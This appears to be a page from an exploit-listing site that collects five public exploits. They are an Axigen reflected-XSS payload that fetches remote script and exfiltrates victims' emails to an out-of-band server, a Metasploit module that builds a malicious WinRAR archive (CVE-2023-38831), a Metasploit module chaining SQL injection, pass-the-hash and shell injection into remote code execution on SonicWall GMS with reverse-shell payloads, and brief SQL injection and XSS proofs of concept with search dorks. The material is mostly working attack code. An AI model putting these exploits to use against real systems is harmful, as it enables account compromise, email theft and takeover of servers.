Latest exploits :: CodePwn

<pre><code># Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS # Google Dork: inurl:passwordexpired=yes # Date: 2023-08-21 # Exploit Author: AmirZargham # Vendor Homepage: https://www.axigen.com/ # Software Link: https://www.axigen.com/mail-server/download/ # Version: (10.5.0–4370c946) and older version of Axigen WebMail # Tested on: firefox,chrome # CVE: CVE-2022-31470 Exploit We use the second Reflected XSS to exploit this vulnerability, create a malicious link, and steal user emails. Dropper code This dropper code, loads and executes JavaScript exploit code from a remote server. '); x = document.createElement('script'); x.src = 'https://example.com/exploit.js'; window.addEventListener('DOMContentLoaded',function y(){ document.body.appendChild(x) })// Encoded form /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})// Exploit code xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new XMLHttpRequest(); oob_server = 'https://example.com/'; var script_tag = document.createElement('script'); xhr1.open('GET', '/', true); xhr1.onreadystatechange = () => { if (xhr1.readyState === XMLHttpRequest.DONE) { _h_cookie = new URL(xhr1.responseURL).search.split("=")[1]; xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`, true); xhr2.setRequestHeader('Content-Type', 'application/json'); xhr2.onreadystatechange = () => { if (xhr2.readyState === XMLHttpRequest.DONE) { if (xhr2.status === 401){ script_tag.src = `${oob_server}?status=session_expired&domain=${document.domain}`; document.body.appendChild(script_tag); } else { resp = xhr2.responseText; folderId = JSON.parse(resp)["mails"][0]["folderId"]; xhr3.open('GET', `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true); xhr3.onreadystatechange = () => { if (xhr3.readyState === XMLHttpRequest.DONE) { emails = xhr3.responseText; script_tag.src = `${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`; document.body.appendChild(script_tag); } }; xhr3.send(); } } }; var body = JSON.stringify({isUnread: false}); xhr2.send(body); } }; xhr1.send(); Combining dropper and exploit You can host the exploit code somewhere and then address it in the dropper code. </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'zip' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'WinRAR CVE-2023-38831 Exploit', 'Description' => %q{ This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution. }, 'License' => MSF_LICENSE, 'Author' => ['Alexander "xaitax" Hagenah'], 'References' => [ ['CVE', '2023-38831'], ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'], ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/'] ], 'Platform' => ['win'], 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Targets' => [['Windows', {}]], 'Payload' => { 'DisableNops' => true }, 'DisclosureDate' => '2023-08-23', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']), OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).']) ]) register_advanced_options([ OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil]) ]) end def exploit Dir.mktmpdir do |temp_dir| output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE']) input_file = datastore['INPUT_FILE'] decoy_name = File.basename(input_file) decoy_ext = ".#{File.extname(input_file)[1..]}" payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe' decoy_dir = File.join(temp_dir, "#{decoy_name}A") Dir.mkdir(decoy_dir) payload_path = File.join(decoy_dir, payload_name) File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) } bat_script = <<~BAT @echo off start "" "%~dp0#{payload_name}" start "" "%~dp0#{decoy_name}" BAT bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd") File.write(bat_path, bat_script) FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B")) zip_path = File.join(temp_dir, 'template.zip') Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile| zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B")) zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path) zipfile.add("#{decoy_name}A/#{payload_name}", payload_path) end content = File.binread(zip_path) content.gsub!(decoy_ext + 'A', decoy_ext + ' ') content.gsub!(decoy_ext + 'B', decoy_ext + ' ') File.binwrite(output_rar, content) print_good("Created #{output_rar}") end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html # We can actually use the title to identify which platform we're on TITLE_WINDOWS = 'SonicWall Universal Management Host' TITLE_LINUX = 'SonicWall Universal Management Appliance' # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator) SECRET_KEY = '?~!@#$%^^()' prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Sonicwall', 'Description' => %q{ This module exploits a series of vulnerabilities - including auth bypass, SQL injection, and shell injection - to obtain remote code execution on SonicWall GMS versions <= 9.9.9320. }, 'License' => MSF_LICENSE, 'Author' => [ 'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis 'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis ], 'References' => [ [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'], [ 'CVE', '2023-34124'], [ 'CVE', '2023-34133'], [ 'CVE', '2023-34132'], [ 'CVE', '2023-34127'] ], 'Privileged' => true, 'Targets' => [ [ 'Linux Dropper', { 'Platform' => ['linux'], 'Arch' => [ARCH_X64], 'Type' => :dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'WritableDir' => '/tmp' } } ], [ 'Windows Command', { 'Platform' => ['win'], 'Arch' => [ARCH_CMD], 'Type' => :cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp', 'WritableDir' => '%TEMP%' } } ], [ 'Linux Command', { 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_CMD], 'Type' => :cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-07-12', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] }, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => '443' } ) ) register_options( [ OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']), ] ) register_advanced_options([ # This varies by target, so don't define the default here OptString.new('WritableDir', [true, 'A directory where we can write files']), ]) end def check vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'method' => 'GET' ) # Basic sanity checks - the path should return a HTTP/200 return CheckCode::Unknown('Could not connect to web service - no response') if res.nil? return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200 # Ensure we're hitting plausible software return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</ # Otherwise, probably safe? CheckCode::Safe('Does not appear to be running SonicWall GMS') end # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 (auth bypass) to # get a password hash def get_password_hash # attempt a sqli. vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...') # SQL injection question to fetch the admin password query = "' union select " + # This must be a valid DOMAIN, which we can thankfully fetch from the DB '(select ID from SGMSDB.DOMAINS limit 1), ' + # These fields don't matter "'', '', '', '', '', " + # This field is returned, so use it to get the id and password for our # the super user, if possible "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," + # The rest of the fields don't matter, end with a single quote to finish with a clean query "'', '', '" vprint_status("Generated SQL injection: #{query}") # We need to sign our query with the SECRET_KEY token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query)) vprint_status("Generated a token using built-in secret key: #{token}") # Build the URI # Note that encoding space to '+' doesn't work, so we replace it with '%20' uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20')) # Do it! print_status('Sending SQL injection request to get the username/hash...') res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'headers' => { 'Auth' => '{"user": "system", "hash": "' + token + '"}' } ) # Sanity checks fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil? fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200 fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.empty? # This field has the SQL injection response hash = res.get_json_document['alias'] # If the server responds with an error, it has no 'alias' field so the key # is missing entirely (this is where it fails against patched targets) fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil? # If alias is present but contains nothing, that means our query got no # results (probably there are no active users, or something?) fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty? # If there's no ':' in the response, something super weird happened fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':') username, hash = hash.split(/:/, 2) print_good("Found an account: #{username}:#{hash}") [username, hash] end # Exploits CVE-2023-34132 (pass the hash) def authenticate(username, hash) # Grab server hashing token vprint_status('Grabbing server hashing token...') res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/appliance/login'), 'keep_cookies' => true ) fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil? # Look for the getPwdHash function call, as it contains the token we need if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil? fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication') end server_token = ::Regexp.last_match(1) vprint_status("Got the server-side token: #{server_token}") # Generate the client_hash by combining the server token + the stolen # password hash client_hash = Digest::MD5.hexdigest(server_token + hash) vprint_status("Generated client token: #{client_hash}") # Send the token print_status('Attempting to authenticate with the client token + password hash...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'), 'keep_cookies' => true, 'vars_post' => { 'action' => 'login', 'clientHash' => client_hash, 'applianceUser' => username } }) fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil? # Check the title to make sure it worked html = res.get_html_document title = html.at('title').text # We can identify the platform based on the title if title == TITLE_LINUX print_good("Successfully logged in as #{username} (Linux detected!)") return Msf::Module::Platform::Linux elsif title == TITLE_WINDOWS print_good("Successfully logged in as #{username} (Windows detected!)") return Msf::Module::Platform::Windows end fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful") end def execute_command_windows(cmd) vprint_status("Encoding (Windows) command: #{cmd}") # While this is a shell command injection issue, an aggressive XSS filter # prevents us from using a lot of important characters such as quotes and # plus and ampersands and stuff. We can't even use Base64, because we can't # use the + sign! # # We discovered that we could encode the command as integers, then use # powershell to decode + execute it, so that's what this does. cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}" encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))" # Run the command vprint_status("Running shell command: #{cmd}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'), 'keep_cookies' => true, 'vars_post' => { 'action' => 'file_system', 'task' => 'search', 'searchFolder' => 'C:\\GMSVP\\etc\\', 'searchFilter' => "|#{encoded_cmd}| rem " } }) # This doesn't work, because our payload blocks and it eventually fails fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty? fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found') print_good('Payload sent!') end def execute_command_linux(cmd) vprint_status('Encoding (Linux) payload') # Generate a filename payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}") # Wrap the command so we can execute arbitrary commands. There are several # difficulties here, the first of which is that we don't have much in the # way of tools. We're missing curl, wget, base64, python, ruby, even perl! # The best tool I could find for staging a payload is uudecode, so we use # that. (I noticed later that telnet exists, which could be another option) # # The good news is, with uudecode, we can send a base64 payload. The bad # news is, we can't use '+', which means we can't use pure base64! To work # around that, we replace '+' with '@', then use a bit of Bash magic to # put it back! We also can't use quotes, so we have to do a mountain of # escaping instead. The default shell is also /bin/sh, so we need to run # bash explicitly for the `$()` substitutions to work. cmd = [ # Build a command that runs in bash (but don't use quotes!) 'bash -c ', # Escape all this for bash Shellwords.escape([ # Use `uudecode` to get a '+' into a variable "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);", # Build a new uuencode file (encoded in base64) with the payload "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n", # Encode the payload as base64, but replace + with a variable "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n", # Pipe into uudecode '==== | uudecode;', # Run in the background with coproc "coproc #{Shellwords.escape(payload_file)};", # Delete the payload file "rm #{payload_file}" ].join) ].join # Run it! vprint_status("Encoded shell command: #{cmd}") print_status('Attempting to execute the shell injection payload') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'), 'keep_cookies' => true, 'vars_post' => { 'action' => 'file_system', 'task' => 'search', 'searchFolder' => '/opt/GMSVP/etc/', 'searchFilter' => ";#{cmd}#" } }) # This doesn't work, because our payload blocks and it eventually fails fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty? fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found') print_good('Payload sent!') end def exploit # Get the password hash (from SQL injection + auth bypass) username, hash = get_password_hash # Use pass-the-hash to log in using that hash detected_platform = authenticate(username, hash) # Sanity-check the target if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform) fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)") end # Generate a payload based on the target type case target['Type'] when :cmd my_payload = payload.encoded when :dropper my_payload = generate_payload_exe else fail_with(Failure::BadConfig, "Unknown target type: #{target.type}") end # Run a command, using the platform specified in the target if target.platform.platforms.include?(Msf::Module::Platform::Linux) execute_command_linux(my_payload) elsif target.platform.platforms.include?(Msf::Module::Platform::Windows) execute_command_windows(my_payload) else fail_with(Failure::Unknown, "Unknown platform: #{platform}") end end end </code></pre>

<pre><code>====================================================================================================================================== | # Title : JPC2 CMS v1.0 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) | | # Vendor : https://www.facebook.com/JPC2GroupWeb | | # Dork : "Web design and development JPC2 Group Web" | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] inject here : http://127.0.0.1/wwwnpmlexcom/en/pagina.php?idcate=13 [+] Panel : http://127.0.0.1/wwwnpmlexcom/en/administrador/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Izdelava IDS v2.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | | # Vendor : http://studiointera.net | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : /preview.php?id=9'<script>alert(/indoushka/);</script> [+] http://127.0.0.1/gspostojnanet/vnosi/cms/preview.php?id=9%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>